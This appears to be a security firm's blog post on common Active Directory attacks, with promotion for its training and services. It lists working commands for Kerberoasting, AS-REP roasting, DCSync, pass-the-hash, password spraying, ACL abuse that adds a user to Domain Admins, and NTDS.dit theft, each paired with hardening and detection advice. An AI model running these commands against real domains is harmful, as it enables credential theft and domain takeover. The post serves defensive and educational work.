Active Directory (AD) remains the backbone of identity and access management in the vast majority of enterprise environments. It is also, without question, one of the most targeted attack surfaces in modern penetration testing and real-world intrusions. Whether you are a blue teamer trying to harden your environment or a red teamer sharpening your skills, understanding how AD breaks is essential.
This post walks through the most commonly exploited Active Directory vulnerabilities, with real commands, payloads, and technical depth. If you want hands-on training built around these exact scenarios, the courses at Redfox Cybersecurity Academy are designed specifically for practitioners who want to go beyond theory.
AD is a centralized authentication and authorization system. Compromise it, and you often have the keys to the entire organization. Domain Controllers (DCs) hold the NTDS.dit database, which contains password hashes for every domain account. Group Policy Objects (GPOs) control what users and machines can do. Service accounts with excessive privileges are everywhere. Misconfigurations stack up quietly over years of growth and mergers.
The attack paths are well-documented, but organizations continue to fall to the same categories of vulnerabilities because fixing them is operationally complex. The red team services at Redfox Cybersecurity regularly identify these exact weaknesses during adversarial simulations across enterprise environments.
Kerberoasting is one of the most prevalent AD attacks in the wild. Any authenticated domain user can request a Kerberos service ticket (TGS) for any service account that has a Service Principal Name (SPN) registered. The ticket is encrypted with the service account's NTLM hash, meaning it can be taken offline and cracked without any interaction with the target system.
Using Impacket's GetUserSPNs.py:
python3 GetUserSPNs.py -request -dc-ip 192.168.1.10 CORP.LOCAL/jsmith:Password123 -outputfile kerberoast_hashes.txt
[cta]
This dumps TGS tickets for all SPNs in the domain. The output file contains hashes in a format ready for hashcat:
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force -O
[cta]
Enforce strong, randomly generated passwords (25+ characters) for all service accounts. Use Group Managed Service Accounts (gMSA) wherever possible. Monitor Event ID 4769 for unusual TGS requests, particularly those using RC4 encryption (etype 0x17) when your environment should be using AES.
AS-REP Roasting targets accounts that have "Do not require Kerberos preauthentication" enabled. Without preauthentication, the KDC returns an AS-REP message encrypted with the user's password hash, even to unauthenticated requesters. This means you do not even need valid credentials to pull crackable material.
python3 GetNPUsers.py CORP.LOCAL/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt -dc-ip 192.168.1.10
[cta]
Then crack offline:
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule
[cta]
Audit accounts with preauthentication disabled using:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth
[cta]
Enable preauthentication on all accounts unless there is a specific technical requirement. Log and alert on AS-REP responses (Event ID 4768 with error code 0x0).
DCSync abuses the Directory Replication Service (DRS) protocol. A Domain Controller replicates AD data to other DCs. If an account has the "Replicating Directory Changes All" and "Replicating Directory Changes" permissions, it can impersonate a DC and pull NTLM hashes for any account, including krbtgt and Domain Admin accounts. This attack does not require code execution on the DC itself.
Using Impacket's secretsdump:
python3 secretsdump.py CORP.LOCAL/domainadmin:Password123@192.168.1.10 -just-dc-user krbtgt
[cta]
Or targeting all accounts:
python3 secretsdump.py CORP.LOCAL/domainadmin:Password123@192.168.1.10 -just-dc-ntlm
[cta]
The krbtgt hash, once obtained, enables Golden Ticket attacks that can persist even after a password reset if the hash is not rotated twice.
Restrict replication rights aggressively. Audit the ACL on the domain object using BloodHound or DSACLs:
(Get-Acl "AD:\DC=corp,DC=local").Access | Where-Object { $_.ActiveDirectoryRights -match "DS-Replication" }
[cta]
Only Domain Controllers and specific replication service accounts should hold these rights. Flag any unexpected accounts immediately.
Windows authentication, particularly NTLM, allows authentication using the hash of a password rather than the plaintext. Once an attacker extracts an NTLM hash via lsass dumping, SAM database extraction, or secretsdump, they can authenticate as that user across the network without ever knowing the actual password.
Using CrackMapExec for lateral movement with a hash:
crackmapexec smb 192.168.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c --local-auth
[cta]
For a specific target using Impacket:
python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c Administrator@192.168.1.50
[cta]
Enable Protected Users security group membership for privileged accounts. This prevents NTLM authentication for those accounts entirely. Implement Credential Guard via Virtualization-Based Security (VBS) to protect lsass. Enforce tiered administration models so that lateral movement with a workstation admin hash does not reach Domain Controllers.
Applications that query Active Directory via LDAP often construct queries using user-supplied input without sanitization. Attackers can manipulate LDAP filters to extract unintended information, bypass authentication, or enumerate sensitive AD attributes. Even without injection, anonymous or low-privilege LDAP enumeration reveals enormous amounts of information about the domain structure.
Unauthenticated LDAP enumeration with ldapsearch:
ldapsearch -x -H ldap://192.168.1.10 -b "DC=corp,DC=local" "(objectClass=user)" sAMAccountName userPrincipalName memberOf
[cta]
For injection, a vulnerable login filter like (&(sAMAccountName=INPUT)(userPassword=INPUT)) can be manipulated:
Username: *)(&
Password: anything
This collapses the filter logic and may return all users depending on the application's error handling.
Disable anonymous LDAP bind on all Domain Controllers. Require LDAP signing and channel binding (KB4520412). Perform regular LDAP ACL audits and treat LDAP enumeration the same as port scanning from an alerting perspective.
When a computer or service account is configured for unconstrained Kerberos delegation, it stores the Ticket Granting Ticket (TGT) of any user that authenticates to it. An attacker who compromises a system with unconstrained delegation can extract cached TGTs, including those of Domain Admins, and reuse them to impersonate those users across the domain.
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation, ServicePrincipalName
[cta]
Get-ADUser -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
[cta]
Once on a compromised system with unconstrained delegation, Rubeus can monitor and extract incoming TGTs in real time:
Rubeus.exe monitor /interval:5 /nowrap
[cta]
Combined with PrinterBug or PetitPotam to coerce DC authentication, this becomes a critical privilege escalation path.
Move away from unconstrained delegation entirely. Use constrained delegation or resource-based constrained delegation (RBCD) with explicit service restrictions. Domain Controllers and highly privileged systems should never be configured with unconstrained delegation. Audit regularly using the PowerShell commands above.
Active Directory objects all have Access Control Lists. Over time, misconfigurations accumulate. A helpdesk account may have WriteDACL on a Domain Admin account. A service account may have GenericAll over an OU containing privileged users. These paths are invisible in normal tooling but trivially exploitable once mapped.
bloodhound-python -u jsmith -p Password123 -d corp.local -dc 192.168.1.10 -c All --zip
[cta]
Once ingested into BloodHound, attackers look for shortest paths to Domain Admin. A common ACL abuse is adding a user to a privileged group via GenericWrite:
Add-DomainGroupMember -Identity "Domain Admins" -Members "jsmith" -Credential $cred
[cta]
Or abusing WriteDACL to grant DCSync rights:
Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity jsmith -Rights DCSync
[cta]
Run BloodHound in your own environment on a scheduled basis as a defensive tool. Audit all non-default ACL entries on sensitive AD objects. Use tiered administration and restrict who can modify high-value groups. Microsoft's ADACLScanner is also useful for bulk ACL reporting.
Domain environments often have lockout policies that trigger after a set number of failed attempts per account. Password spraying flips the model: one password, many usernames. By staying under the lockout threshold per account, attackers can test common passwords across the entire user population without triggering lockouts.
Using CrackMapExec:
crackmapexec smb 192.168.1.10 -u users.txt -p 'Winter2026!' --continue-on-success
[cta]
Or using Spray against OWA or ADFS endpoints:
python3 spray.py -u users.txt -p 'Welcome1' -s https://mail.corp.com/owa/ -t 10
[cta]
Service desk reset patterns like Companyname@2026, Welcome1, and Season+Year combinations succeed far more often than organizations expect.
Implement Azure AD Password Protection or an on-premises equivalent to ban common and pattern-based passwords at the DC level. Enable Fine-Grained Password Policies to enforce stricter controls on privileged accounts. Deploy a SIEM rule to alert on distributed low-frequency failed authentication across many accounts in a short time window.
NTDS.dit is the Active Directory database stored on every Domain Controller. It contains the NTLM password hashes, Kerberos keys, and password history for every domain account. Direct access to this file, combined with the SYSTEM hive, allows offline extraction of all credential material in the domain.
Using VSS shadow copy to bypass file locks:
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Temp\ntds.dit
reg save HKLM\SYSTEM C:\Temp\SYSTEM
[cta]
Then extract offline with Impacket:
python3 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
[cta]
Restrict physical and RDP access to Domain Controllers. Monitor VSS creation events (Event ID 8222) and flag any shadow copy creation from non-standard processes. Implement Privileged Access Workstations (PAWs) for all DC management. Tier 0 systems should have minimal attack surface and aggressive logging.
Active Directory vulnerabilities are not theoretical. They are consistently exploited across industries, from financial services to healthcare, in penetration tests and real breach investigations alike. The attack chains covered here, including Kerberoasting, DCSync, delegation abuse, and ACL exploitation, represent the core curriculum of any serious red team engagement.
Understanding these techniques is only part of the challenge. Operationalizing defenses, building detection logic, and running regular adversarial simulations to validate controls is what separates environments that get breached from those that catch attackers early.
If you are a security practitioner who wants structured, hands-on training covering these exact attack paths, Redfox Cybersecurity Academy at https://academy.redfoxsec.com offers courses built around real-world red team scenarios, not checkbox certifications.
If your organization needs a professional Active Directory security assessment or full adversarial simulation, the team at Redfox Cybersecurity delivers engagements grounded in the same techniques described in this post, with actionable remediation guidance tailored to your environment.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
